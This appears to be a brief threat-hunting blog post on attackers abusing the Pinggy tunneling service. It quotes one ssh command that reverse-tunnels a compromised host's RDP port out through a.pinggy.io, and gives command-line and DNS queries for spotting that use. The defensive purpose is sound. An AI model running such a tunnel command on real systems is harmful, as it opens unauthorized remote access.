186. Pinggy: Another Tunneling Solution Abused by Adversaries

Hello everyone!

Have you read recent CrowdStrike's report on SCATTERED SPIDER activity? If not, make sure you have! It contains lots of valuable information on adversary's tactics, techniques and procedures.

One of them - abusing Pinggy - another privacy-focused tunneling solution. It's interesting that threat actors don't even have to drop its binary to the compromised system, they can use just ssh, for example:

ssh -p 443 -R0:127.0.0.1:3389 -o StrictHostKeyChecking=no -o ServerAliveInterval=30 4FohZ817ZPe+tcp@a.pinggy.io

So, the first thing to hunt for is "pinggy" in the command line:

event_type: "processcreatewin"

AND

cmdline: "pinggy"

Another opportunity is hunting for Pinggy-related domains:

event_type: "dnsreq"

AND

dns_rname: ("pinggy.io" OR "pinggy.link")

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge